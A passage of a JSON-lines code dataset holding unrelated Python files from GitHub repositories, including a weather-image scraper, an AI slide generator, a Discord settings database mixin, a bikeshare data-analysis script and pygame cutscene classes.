html.xpath('//div[@class=\"writing\"]/p')\n image = html.xpath('//div[@class=\"writing\"]/div/img/@src')\n text_name = title+ret\n text_x = []\n for i in text_name:\n if i.text != None:\n text_x.append(i.text)\n\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n return text_x\n\n\n\ndef wumai():\n response = session.get(url= fog_url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n response = session.get(url=haze_url, headers=headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image1 = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n image = image+image1\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n\n\n\ndef shachen():\n response = session.get(url= dust_url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n\ndef air_p():\n image = []\n for url in air_pollution_url:\n response = session.get(url= url,headers = headers)\n response.encoding = \"utf-8\"\n res = response.text\n html = etree.HTML(res)\n image1 = html.xpath('//div[@class=\"imgblock\"]/img/@src')\n image+=image1\n\n for i in range(len(image)):\n if image[i] != None:\n res = session.get(image[i],headers = headers)\n with open('county_image/' + str(i) + '.jpg', 'wb') as f:\n f.write(res.content)\n","repo_name":"cycle13/demo","sub_path":"微信自动发送数据/淮阳/county_aqi.py","file_name":"county_aqi.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41231417405","text":"import io\nimport os\nimport random\nimport tempfile\n\nimport openai\nimport requests\nfrom PIL import Image\nfrom pptx.dml.color import RGBColor\nfrom pptx.util import Inches, Pt\n\nfrom utils import ask_chatgpt, get_dominant_colors, contrast_color, text_width, dim_image, adjust_contrast, apply_blur, \\\n apply_overlay\n\n\ndef generate_title(prompt, max_tokens=40):\n return ask_chatgpt(prompt, max_tokens)\n\n\ndef generate_bullet_points(prompt, max_tokens=300):\n response = ask_chatgpt(prompt, max_tokens)\n\n bullet_points = response.strip().split(\"\\n\")\n return bullet_points\n\n\ndef add_picture_from_pil_image(slide, pil_image, left, top, width, height):\n # Save the PIL image to a temporary in-memory file\n with tempfile.NamedTemporaryFile(suffix=\".png\", delete=False) as image_file:\n pil_image.save(image_file, \"PNG\")\n image_file.seek(0)\n image_filename = image_file.name\n\n # Add the temporary file to the slide\n picture_shape = slide.Shapes.AddPicture(\n FileName=image_filename,\n LinkToFile=-1, # Do not link to the file (embed the picture)\n SaveWithDocument=-1, # Save the picture with the document\n Left=left,\n Top=top,\n Width=width,\n Height=height,\n )\n\n # Delete the temporary file from disk\n dominant_colors = get_dominant_colors(image_filename)\n text_color = contrast_color(dominant_colors[0])\n\n os.remove(image_filename)\n\n return text_color\n\n\ndef apply_background_manipulations(image_filename):\n # Load the image\n image = Image.open(image_filename)\n\n # Adjust brightness, contrast, blur, and overlay\n brightness_factor = 0.4\n contrast_factor = 3\n blur_radius = 2\n overlay_color = (0, 0, 0, 255)\n overlay_alpha = 0.3\n\n image = dim_image(image, brightness_factor)\n image = adjust_contrast(image, contrast_factor)\n image = apply_blur(image, blur_radius)\n image = apply_overlay(image, overlay_color, overlay_alpha)\n\n # Save the modified image\n image.save(image_filename)\n\n\ndef add_picture_from_pil_image_as_background(slide, presentation, pil_image):\n # Save the PIL image to a temporary in-memory file\n with tempfile.NamedTemporaryFile(suffix=\".png\", delete=False) as image_file:\n pil_image.save(image_file, \"PNG\")\n image_file.seek(0)\n image_filename = image_file.name\n\n apply_background_manipulations(image_filename)\n\n # Set the slide background image\n pic = slide.shapes.add_picture(image_filename, 0, 0, width=presentation.slide_width,\n height=presentation.slide_height)\n\n # This moves it to the background\n slide.shapes._spTree.remove(pic._element)\n slide.shapes._spTree.insert(2, pic._element)\n\n # Delete the temporary file from disk\n os.remove(image_filename)\n return\n\n\nasync def add_related_picture(slide, presentation, prompt):\n # Generate the image using DALL-E\n response = openai.Image.create(prompt=prompt)\n\n # Get the image URL from the response\n image_url = response[\"data\"][0][\"url\"]\n\n # Download the image from the URL\n image_data = requests.get(image_url).content\n\n # Load the image data into a PIL Image object\n pil_image = Image.open(io.BytesIO(image_data))\n\n add_picture_from_pil_image_as_background(slide, presentation, pil_image)\n return\n\n\nasync def generate_slide(presentation, topic):\n prompt = f\"Change the question: \\\"'{topic}'\\\" to a verbal noun title for an article. Start your title here:\"\n title = generate_title(prompt).replace('\"', '').replace('\\n', '')\n print(f\"Title: {title}\")\n\n prompt = f\"Please provide a summary and interesting information about the topic \\\"{title}\\\" using bullet points. Use the following format for your response:\" \\\n f\"\\n• Main Point 1\\n--• Sub-point 1.1\\n--• Sub-point 1.2\\n• Main Point 2\\n\\nStart your response here:\"\n bullet_points = generate_bullet_points(prompt)\n\n # Add a slide to the presentation\n slide_layout = presentation.slide_layouts[5]\n slide = presentation.slides.add_slide(slide_layout)\n\n # Add background image that is related to the topic\n await add_related_picture(slide, presentation, title)\n\n # Set the slide title\n title_shape = slide.shapes.title\n title_shape.text = title\n title_shape.text_frame.paragraphs[0].runs[0].font.color.rgb = RGBColor(255, 255, 255)\n\n # Set the initial font size\n font_size = Pt(44)\n\n # Calculate the text width based on the initial font size\n text_width_pixels = text_width(title_shape.text, int(font_size))\n\n # Adjust the font size if the title exceeds the slide width\n slide_width_pixels = Inches(13) # For 16:9\n\n while text_width_pixels > slide_width_pixels:\n font_size -= Pt(1)\n text_width_pixels = text_width(title_shape.text, int(font_size))\n\n # Apply the adjusted font size to the title\n title_shape.text_frame.paragraphs[0].runs[0].font.size = font_size\n title_shape.text_frame.paragraphs[0].runs[0].font.name = 'Goudy Old Style (Headings)'\n\n # Add bullet points to the slide\n left = Inches(1.3)\n top = Inches(1.2)\n width = Inches(random.randint(9, 10)) # Set the width to the random slide width\n height = Inches(6)\n\n tx_box = slide.shapes.add_textbox(left, top, width, height)\n tf = tx_box.text_frame\n\n # Adjust the text box properties\n tf.word_wrap = True # Enable word wrapping\n tf.auto_size = 0 # Disable auto resizing\n tf.margin_left = Inches(0.1) # Set left margin\n tf.margin_right = Inches(0.1) # Set right margin\n tf.margin_top = Inches(0.1) # Set top margin\n tf.margin_bottom = Inches(0.1) # Set bottom margin\n\n # Add nested bullet points to the text of the presentation\n for point in bullet_points:\n if point.startswith(\"--\"):\n p = tf.add_paragraph()\n p.text = point.strip(\"-\")\n p.level = 1\n else:\n p = tf.add_paragraph()\n p.text = u'\\u2794' + ' ' + point.strip(\"•\")\n p.level = 0\n p.font.name = \"Avenir Next LT Pro (Body)\"\n p.font.italic = True\n p.space_before = Pt(10)\n\n p.font.color.rgb = RGBColor(255, 255, 255)\n\n return\n","repo_name":"kfirtaizi/EndlessPresentation","sub_path":"slide_generator.py","file_name":"slide_generator.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14766188512","text":"my_file = open('file.txt', 'w')\nmy_file.write('Hello Python')\nmy_file.close()\n\nnew_my_file = open(\"file.txt\", \"a\")\nnew_my_file.write(\"Bye Python\")\nnew_my_file.close()\n\nread_file = open(\"file.txt\")\nprint(read_file.read())\nread_file.close()\n\n\n#Dosya var ise ac ve oku. With blogunun icinden cıkarken dosya otomatik kapanır, close() kullanmamıza gerek yoktur.\nwith open(\"new.txt\") as file:\n print(file.read())\n\n\n","repo_name":"hilaldiler/2019oyk-yaz-python","sub_path":"basic/file_operations.py","file_name":"file_operations.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72238871506","text":"import numpy as np\nfrom visdom import Visdom\n\nviz = Visdom()\n\ndef contour(data, title):\n viz.contour(\n X=np.array(data),\n win=title,\n opts=dict(\n title=title\n )\n )\n\ndef plot_V(V):\n contour(V, 'Values - Car Rental')\n\ndef plot_P(P):\n contour(P, 'Policy - Car Rental')\n","repo_name":"BCHoagland/Sutton-and-Barto","sub_path":"04 - Dynamic Programming/car_rental/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2002117052","text":"from typing import Union, Optional, List, Tuple, Set\nfrom discord import Guild\nfrom dataclasses import fields\nfrom ..guild_settings import GuildSettings\n\nfrom ..async_list import AsyncList, async_list\nfrom .._connection import _PostgresConnection\n\n\nclass GuildSettingsMixin(_PostgresConnection):\n @async_list\n async def alias_guilds(self) -> AsyncList:\n await self.cur.execute(\n \"SELECT guild_id FROM guild_settings WHERE is_alias_server=true\"\n )\n return [gid for gid, in await self.cur.fetchall()]\n\n async def personas_guilds(self) -> Set[str]:\n await self.cur.execute(\n \"SELECT guild_id FROM guild_settings WHERE enable_personas=true\"\n )\n return {str(gid) for gid, in await self.cur.fetchall()}\n\n @async_list\n async def guild_prefixes(self) -> AsyncList:\n await self.cur.execute(\n \"SELECT guild_id, prefix FROM guild_settings\"\n )\n return await self.cur.fetchall()\n\n @async_list\n async def guild_settings(self) -> AsyncList:\n await self.cur.execute(\n \"SELECT guild_id, prefix, locale, max_guildwide_emotes, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, enable_pings, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection FROM guild_settings\"\n )\n results = await self.cur.fetchall()\n return [GuildSettings(*i) for i in results]\n\n async def get_guild_settings(self, guild_id: Union[Guild, int]) -> Optional[GuildSettings]:\n await self.cur.execute(\n \"SELECT guild_id, prefix, locale, max_guildwide_emotes, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, enable_pings, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection FROM guild_settings WHERE guild_id=%(guild_id)s\",\n parameters={\"guild_id\": guild_id}\n )\n results = await self.cur.fetchall()\n if not results:\n return None\n return GuildSettings(*results[0])\n\n async def get_guild_rank(self, max_emotes: int) -> int:\n await self.cur.execute(\n \"SELECT count(*) FROM guild_settings WHERE max_guildwide_emotes > %(max_emotes)s\",\n parameters={\"max_emotes\": max_emotes}\n )\n results = await self.cur.fetchall()\n return results[0][0]\n\n async def get_top_10_rank(self) -> List[Tuple[int, int]]:\n await self.cur.execute(\n \"SELECT guild_id, max_guildwide_emotes FROM guild_settings ORDER BY max_guildwide_emotes DESC LIMIT 10\"\n )\n return await self.cur.fetchall()\n\n async def set_guild_settings(self, guild_settings: GuildSettings):\n await self.cur.execute(\n \"INSERT INTO guild_settings (guild_id, prefix, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, locale, enable_pings, max_guildwide_emotes, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection) VALUES \"\n \"(%(guild_id)s, %(prefix)s, %(nitro_role)s, %(boost_channel)s, %(boost_role)s, %(audit_channel)s, %(enable_stickers)s, %(enable_nitro)s, %(enable_replies)s, %(is_alias_server)s, %(locale)s, %(enable_pings)s, %(max_guildwide_emotes)s, %(enable_user_content)s, %(enable_personas)s, %(enable_dashboard_posting)s, %(enable_phish_detection)s)\"\n 'ON CONFLICT (guild_id) DO UPDATE SET (prefix, nitro_role, boost_channel, boost_role, audit_channel, enable_stickers, enable_nitro, enable_replies, is_alias_server, \"locale\", enable_pings, max_guildwide_emotes, enable_user_content, enable_personas, enable_dashboard_posting, enable_phish_detection) = '\n \"(EXCLUDED.prefix, EXCLUDED.nitro_role, EXCLUDED.boost_channel, EXCLUDED.boost_role, EXCLUDED.audit_channel, EXCLUDED.enable_stickers, EXCLUDED.enable_nitro, EXCLUDED.enable_replies, EXCLUDED.is_alias_server, EXCLUDED.locale, EXCLUDED.enable_pings, EXCLUDED.max_guildwide_emotes, EXCLUDED.enable_user_content, EXCLUDED.enable_personas, EXCLUDED.enable_dashboard_posting, EXCLUDED.enable_phish_detection)\",\n parameters={field.name: getattr(guild_settings, field.name) for field in fields(guild_settings)}\n )\n\n async def delete_guild_settings(self, guild_id: int):\n await self.cur.execute(\n \"DELETE FROM guild_settings WHERE guild_id=%(guild_id)s\",\n parameters={\"guild_id\": guild_id}\n )\n","repo_name":"NQN-Discord/sql_helper","sub_path":"sql_helper/mixins/guild_settings.py","file_name":"guild_settings.py","file_ext":"py","file_size_in_byte":4572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70901253907","text":"class Solution:\n def finalString(self, s: str) -> str:\n temp = []\n for i in range(len(s)):\n if s[i] == 'i':\n temp.reverse()\n else:\n temp.append(s[i])\n\n return ''.join(temp)\n\nsol = Solution()\nprint(sol.finalString(\"poiinter\"))\n","repo_name":"anujvaghani0/DSA-Python","sub_path":"String/FaultyKeyboard.py","file_name":"FaultyKeyboard.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21436659660","text":"# prepro.py\n# Preprocesses an AST.\nfrom .ast import *\nfrom .parse import Parser\nimport os.path as path\n\ndef _path_find(import_path: List[str], filename: str):\n for d in import_path:\n if not path.isdir(d): continue\n fullpath = path.join(d, filename)\n if not path.isfile(fullpath): continue\n return fullpath\n\nclass Preprocess:\n def __init__(self, path: str, search_dirs: List[str], ast: Source, ignore=None):\n if ignore is None:\n ignore = []\n self.path = path\n self.search_dirs = search_dirs\n self.ast = ast\n self.ignore = ignore\n\n def preprocess(self) -> Source:\n src = []\n rm = []\n for top in self.ast:\n # skip non-imports\n if type(top) is not Import: continue\n # skip imports we've already visited\n inc_path = self.deduce_path(top.path)\n if inc_path is None:\n raise PreprocessImportError(top.range, top.path, self.search_dirs)\n # read and parse the source of the import file\n abs_include = path.abspath(inc_path)\n if abs_include in self.ignore:\n rm += [top]\n continue\n self.ignore += [abs_include]\n with open(inc_path) as fp:\n source = fp.read()\n try:\n parser = Parser(source, inc_path)\n ast = parser.parse()\n prepro = Preprocess(inc_path, self.search_dirs, ast, self.ignore)\n src += prepro.preprocess()\n src += prepro.ast\n except ParseError as e:\n raise ChainedError(inc_path, e)\n except ChainedError as e:\n raise ChainedError(inc_path, e)\n rm += [top]\n for r in rm:\n self.ast.remove(r)\n return src\n\n def deduce_path(self, name: str) -> Any:\n # if it's an absolute path that exists, just use that\n if path.isabs(name):\n return name\n inc_dir = path.dirname(name)\n for prefix in [inc_dir] + self.search_dirs:\n extd = path.join(prefix, name)\n if path.isfile(extd):\n return extd\n return None\n","repo_name":"alekratz/sbl-py","sub_path":"sbl/syntax/prepro.py","file_name":"prepro.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11147743227","text":"import time\nimport pandas as pd\nimport numpy as np\n\n\n\ncity_data_dictionary = {\n \"chicago\": r\"E:\\DATA ANALYSIS\\Udacity\\fwd-egypt\\Data Analysis Professional Track\\bike share project\\chicago.csv\",\n \"new york city\": r\"E:\\DATA ANALYSIS\\Udacity\\fwd-egypt\\Data Analysis Professional Track\\bike share project\\new_york_city.csv\",\n \"washington\": r\"E:\\DATA ANALYSIS\\Udacity\\fwd-egypt\\Data Analysis Professional Track\\bike share project\\washington.csv\"\n}\n\npd.set_option(\"display.max_columns\", None)\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Welcome to egFWD - Data Professional Track - December 2021 Cohort')\n print('First Project: Explore US Bikeshare')\n print('By AHMED ELSAWY, on 13-12-2021')\n print(\"#\"*50)\n print('\\nLet\\'s explore some US bikeshare data concerning three cities: chicago, new york city and washington.\\n')\n\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n cities_list = ['chicago', 'new york city', 'washington']\n city_input = input(\"Please, select a city:\\n'chicago', 'new york city' or 'washington'\\n=> \").lower()\n if city_input not in cities_list:\n print(\"Whoops! Invalid city!\")\n else:\n break\n\n # get user input for month (all, january, february, ... , june)\n while True:\n months_list = ['January', 'February', 'March', 'April', 'May', 'June']\n month_input = input(\"Please, select a month or type 'all' to skip months filter:\\n\"\n \" 'january', 'february', 'march', 'april', 'may', 'june'\\n=> \").capitalize()\n if month_input not in months_list and month_input != \"All\":\n print(\"Whoops! Invalid month!\")\n else:\n break\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True:\n days_list = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n day_input = input(\"Please, select a day or type 'all' to skip days filter:\\n\"\n \" 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'\\n=> \").capitalize()\n if day_input not in days_list and day_input != \"All\":\n print(\"Whoops! Invalid day!\")\n else:\n break\n\n print('-'*40)\n return city_input, month_input, day_input\n\n\ndef load_data(city_input, month_input, day_input):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city_input - name of the city to analyze\n (str) month_input - name of the month to filter by, or \"all\" to apply no month filter\n (str) day_input - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n df = pd.read_csv(city_data_dictionary[city_input])\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['month'] = df['Start Time'].dt.strftime('%B')\n df['day_of_week'] = df['Start Time'].dt.day_name()\n # filter by month if applicable\n if month_input != \"All\":\n # filter by month to create the new dataframe\n df = df[df['month'] == month_input]\n\n # filter by day of week if applicable\n if day_input != \"All\":\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day_input] # capitalize first letter of input to match results obtained from line 77\n\n return df\n\n\ndef display_five_lines_of_raw_data(df):\n \"\"\"\n According to the project rubric:\n Raw data is displayed upon request by the user in the following manner:\n -script should prompt the user if they want to see 5 lines of raw data,\n -Display that data if the answer is 'yes',\n -Continue iterating these prompts and displaying the next 5 lines of raw data at each iteration,\n -Stop the program when the user says 'no' or there is no more raw data to display.\n -Tips: you can implement the while loop and track the row index in order to display the continuous raw data.\n \"\"\"\n print(\"Great! raw data is ready according to your previous preferences.\")\n print(\"If you wish to display 5 lines of the raw data, please let me know.\")\n num_of_lines = 0\n while True:\n user_feedback = input(\"Display next 5 lines of raw data? type yes or no => \").lower()\n if user_feedback == \"no\":\n break\n #Stop the loop when the user says 'no'.\n\n if user_feedback != \"no\" and user_feedback != \"yes\":\n print(\"Whoops! Invalid Choice!\")\n continue\n\n if user_feedback == \"yes\":\n print(df[num_of_lines:num_of_lines + 5])\n num_of_lines += 5\n\n if num_of_lines >= len(df.index): #or num_of_lines >= df.shape[0]:# Both are synonymous\n print(\"All lines already displayed.\\nNo More Lines To Display.\")\n break\n #Stop the loop when there is no more raw data to display.\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n print(\"The most common month is: \", df['month'].value_counts().idxmax())\n\n\n # display the most common day of week\n print(\"The most common day of week is: \", df['day_of_week'].value_counts().idxmax())\n\n\n\n # display the most common start hour\n print(\"The most common start hour is: \", df['Start Time'].dt.hour.value_counts().idxmax())\n\n\n print(f\"\\nThis calculation took {time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print(\"The most commonly used start station is: \", df['Start Station'].value_counts().idxmax())\n\n\n # display most commonly used end station\n print(\"The most commonly used end station is: \", df['End Station'].value_counts().idxmax())\n\n\n # display most frequent combination of start station and end station trip\n df[\"Combination of Start and End Stations\"] = df['Start Station'] + \" => \" + df['End Station']\n print(\n \"The most frequent trip ( Start => End ) is : (\",\n df[\"Combination of Start and End Stations\"].value_counts().idxmax(), \")\"\n )\n\n\n print(f\"\\nThis took {time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time = ttt\n ttt_sec = df[\"Trip Duration\"].sum()\n ttt_min = ttt_sec / 60\n ttt_hrs = ttt_min / 60\n ttt_days = ttt_hrs / 24\n print(f\"Total Travel Time = {ttt_sec} seconds, \"\n f\"or about {ttt_min} minutes, or about {ttt_hrs} hours, or about {ttt_days} days.\")\n\n\n\n # display mean travel time = mtt\n mtt_sec = df[\"Trip Duration\"].mean()\n mtt_min = mtt_sec / 60\n mtt_hrs = mtt_min / 60\n mtt_days = mtt_hrs / 24\n print(f\"Mean Travel Time = {mtt_sec} seconds, \"\n f\"or about {mtt_min} minutes, or about {mtt_hrs} hours, or about {mtt_days} days.\")\n\n\n print(f\"\\nThis took {time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n print(\"Counts of user types: \")\n print(df[\"User Type\"].value_counts())\n print(\"-\"*20)\n\n # Display counts of gender\n if \"Gender\" in df:\n print(\"Counts of gender: \")\n print(df[\"Gender\"].value_counts())\n print(\"-\" * 20)\n\n # Display earliest, most recent, and most common year of birth\n if \"Birth Year\" in df:\n print(\"Earliest year of birth: \", df[\"Birth Year\"].min())\n print(\"Most recent year of birth: \", df[\"Birth Year\"].max())\n print(\"Most common year of birth: \", df[\"Birth Year\"].mode()[0])\n print(\"-\" * 20)\n\n print(f\"\\nThis took {time.time() - start_time} seconds.\")\n print('-'*40)\n\n\ndef main():\n while True:\n city_input, month_input, day_input = get_filters()\n df = load_data(city_input, month_input, day_input)\n\n display_five_lines_of_raw_data(df)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? type yes or no.\\n=> ')\n if restart.lower() != 'yes':\n print(\"Thank You! See You In Next Projects *_*\")\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ahmedelsawy-as/Project-Explore-US-Bikeshare-Data","sub_path":"bikeshare_2.py","file_name":"bikeshare_2.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7096022185","text":"def super_func(*args):\n print(args)\n print(*args)\n return sum(args)\nsuper_func(1, 2, 3, 4, 5, 6)\n\ndef super_func1(*args, **kwargs):\n print(args)\n print(kwargs)\n total = 0\n for item in kwargs.values():\n total += item\n return sum(args) + total\nprint(super_func1(1, 2, 3, 4, 5, 6, num1=15, num2=20, num3= 10))\n\n#Rule : parameter, *args, default parameter, **kwargs\n\ndef highest_even(list):\n even = []\n for item in list:\n if item % 2 == 0:\n even.append(item)\n return max(even)\n\nprint(highest_even([10, 3, 4, 6, 8, 11]))\n\ntotal = 0\ndef count():\n global total\n total += 1\n return total\ncount()\ncount()\nprint(count())\n\ndef outer():\n x = 'local'\n def inner():\n nonlocal x\n x = 'nonlocal'\n print('inside : ', x)\n inner()\n print('outer : ', x)\n\nouter()\ny = 'Hello'[0]\nprint(y)\n","repo_name":"mohmutho/fund_python","sub_path":"args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74178195024","text":"\r\n\r\n#https://stackoverflow.com/questions/46184239/python-extract-a-page-from-a-pdf-as-a-jpeg\r\nimport os, subprocess,time\r\n\r\npdf_dir = r\"D:\\mgw_CFpermitsFD_OMM\\Python_Scripts\\test\"\r\nos.chdir(pdf_dir)\r\n\r\npdftoppm_path = r\"C:\\Program Files\\poppler-0.68.0\\bin\\pdftoppm.exe\"\r\n\r\n\r\nfor pdf_file in os.listdir(pdf_dir):\r\n\r\n if pdf_file.endswith(\".pdf\"):\r\n outfile = pdf_file[0:-4]\r\n\r\n #subprocess.Popen('\"%s\" -jpeg %s ye' % (pdftoppm_path, pdf_file))\r\n subprocess.Popen('\"{}\" -jpeg {} {}'.format(pdftoppm_path, pdf_file,outfile))\r\n print(\"successfully converted\")\r\ntime.sleep(3) \r\n\r\n\r\nfor jpg in os.listdir(pdf_dir):\r\n if jpg.endswith(\".jpg\"):\r\n new_jpg = jpg[0:-6]+\".jpg\"\r\n print(new_jpg)\r\n os.rename(pdf_dir+\"\\\\\"+jpg,pdf_dir+\"\\\\\"+new_jpg)\r\n \r\n print(pdf_dir+\"\\\\\"+jpg,pdf_dir+\"\\\\\"+new_jpg)\r\n ","repo_name":"yhaung/Pythoncodes_in_CF_database_project","sub_path":"pdf2image.py","file_name":"pdf2image.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73278624145","text":"\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport cv2\nimport datetime\nfrom model_final_mv3 import DABLNet\nimport statistics as stat\nfrom visualize import get_color_pallete\nimport os\nparse = argparse.ArgumentParser()\nparse.add_argument(\n '--ckpt',\n dest='ckpt',\n type=str,\n default='./res/model_non_local.pth',)\n\nparse.add_argument(\n '--data_dir',\n dest='data_dir',\n type=str,\n default='./val/munster',)\n\nparse.add_argument(\n '--save_dir',\n dest='save_dir',\n type=str,\n default='./outputs',)\n\nargs = parse.parse_args()\nos.makedirs(args.save_dir, exist_ok=True)\n\n# define model\nnet = DABLNet(n_classes=19)\nnet.load_state_dict(torch.load(args.ckpt, map_location='cpu'))\nnet.eval()\nnet.cuda()\n\n# prepare data\nto_tensor = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n ])\n\nimage_list = os.listdir(args.data_dir)\nfor image in image_list:\n im = to_tensor(Image.open(os.path.join(args.data_dir, image)).convert('RGB')).unsqueeze(0).cuda()\n output = net(im)\n pred = torch.argmax(output[0], 1).squeeze(0).cpu().data.numpy()\n mask = get_color_pallete(out, 'citys')\n save_path = os.path.join(args.save_dir, image)\n #cv2.imwrite(save_path, out)\n mask.save(save_path)","repo_name":"dronefreak/CABiNet","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"9452989280","text":"import pygame\r\nfrom pymphony.colors import BLACK\r\n\r\n\r\nclass Cutscene:\r\n \"\"\" the base class for future cutscenes. \"\"\"\r\n def __init__(self):\r\n pass\r\n\r\n\r\nclass FadeIn:\r\n \"\"\" a fade to black and back \"\"\"\r\n\r\n # speed we fade in/out\r\n speed = 20\r\n\r\n # how many frames we linger on\r\n linger = 0\r\n hold_cou = 0\r\n\r\n def __init__(self, screen, gsobj):\r\n self.screen = screen\r\n self.screct = self.screen.get_rect()\r\n\r\n self.gsobj = gsobj\r\n\r\n self.image = pygame.Surface(self.screct.size)\r\n self.image.fill(BLACK)\r\n\r\n self.image.set_alpha(0)\r\n\r\n # are we fading in or out?\r\n self.fade_in = True\r\n\r\n # is this transition done or not?\r\n self.done = False\r\n\r\n def update(self):\r\n \"\"\" update our image's alpha value \"\"\"\r\n if self.fade_in:\r\n self.image.set_alpha(self.image.get_alpha() + self.speed)\r\n elif self.image.get_alpha() > 0:\r\n if self.hold_cou >= self.linger:\r\n self.image.set_alpha(self.image.get_alpha() - self.speed)\r\n else:\r\n self.hold_cou += 1\r\n else:\r\n self.finish()\r\n\r\n if self.image.get_alpha() >= 255:\r\n self.fade_in = False\r\n\r\n def finish(self):\r\n \"\"\" called when the transition is finished \"\"\"\r\n self.done = True\r\n\r\n def draw(self):\r\n \"\"\" draw the image on the screen \"\"\"\r\n self.screen.blit(self.image, (0, 0))\r\n\r\n def reset(self):\r\n \"\"\" reset the transition \"\"\"\r\n self.done = False\r\n self.fade_in = True\r\n\r\n\r\nclass CutTo:\r\n \"\"\" cut to black for a few seconds \"\"\"\r\n # how many frames we linger on\r\n linger = 5\r\n hold_cou = 0\r\n\r\n def __init__(self, screen, gsobj):\r\n self.screen = screen\r\n self.screct = self.screen.get_rect()\r\n\r\n self.gsobj = gsobj\r\n\r\n self.image = pygame.Surface(self.screct.size)\r\n self.image.fill(BLACK)\r\n\r\n # is this transition done or not?\r\n self.done = False\r\n\r\n def update(self):\r\n \"\"\" update our image's alpha value \"\"\"\r\n if self.hold_cou < self.linger:\r\n self.hold_cou += 1\r\n else:\r\n self.finish()\r\n\r\n def finish(self):\r\n \"\"\" called when the transition is finished \"\"\"\r\n # set the state back to the player\r\n self.gsobj.state = 1\r\n\r\n # reset the transition for the future\r\n self.reset()\r\n\r\n self.done = True\r\n\r\n def draw(self):\r\n \"\"\" draw the image on the screen \"\"\"\r\n self.screen.blit(self.image, (0, 0))\r\n\r\n def check_event(self, event):\r\n 